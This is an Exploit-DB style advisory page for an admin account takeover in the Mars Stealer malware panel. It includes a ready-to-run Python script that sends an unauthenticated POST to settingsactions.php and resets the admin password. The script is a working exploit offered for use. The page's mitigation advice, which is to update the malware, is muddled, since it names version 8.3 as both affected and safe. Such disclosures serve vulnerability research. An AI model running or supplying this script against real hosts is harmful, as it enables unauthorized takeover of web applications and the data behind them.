Mars Stealer 8.3 - Admin Account Takeover

vendor:

Mars Stelaer

by:

Sköll

7.4

CVSS

HIGH

Admin Account Takeover

287

CWE

Product Name: Mars Stelaer

Affected Version From: < 8.3

Affected Version To: 8.3

Patch Exists: YES

Related CWE:

CPE: a:mars_stealer:mars_stealer

Metasploit:

Other Scripts:

Platforms Tested: Linux

2023

Mars Stealer 8.3 – Admin Account Takeover

Mars Stealer is vulnerable to an admin account takeover exploit. This exploit allows an attacker to change the admin password of the application using a POST request to the settingsactions.php file. The attacker can then use the new password to gain access to the application.

Mitigation:

Ensure that the application is updated to the latest version of Mars Stealer 8.3 or higher.

Source

Exploit-DB raw data:

# Exploit Title: Mars Stealer 8.3 - Admin Account Takeover
# Product: Mars Stelaer
# Technology: PHP
# Version: < 8.3
# Google Dork: N/A
# Date: 20.04.2023
# Tested on: Linux 
# Author: Sköll - twitter.com/s_k_o_l_l


import argparse
import requests

parser = argparse.ArgumentParser(description='Mars Stealer Account Takeover Exploit')
parser.add_argument('-u', '--url', required=True, help='Example: python3 exploit.py -u http://localhost/')
args = parser.parse_args()

url = args.url.rstrip('/') + '/includes/settingsactions.php'
headers = {"Accept": "application/json, text/javascript, */*; q=0.01", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Sköll", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Origin": url, "Referer": url, "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US;q=0.8,en;q=0.7"}
data = {"func": "savepwd", "pwd": "sköll"} #change password
response = requests.post(url, headers=headers, data=data)

if response.status_code == 200:
    print("Succesfull!")
    print("New Password: " + data["pwd"])
else:
	print("Exploit Failed!")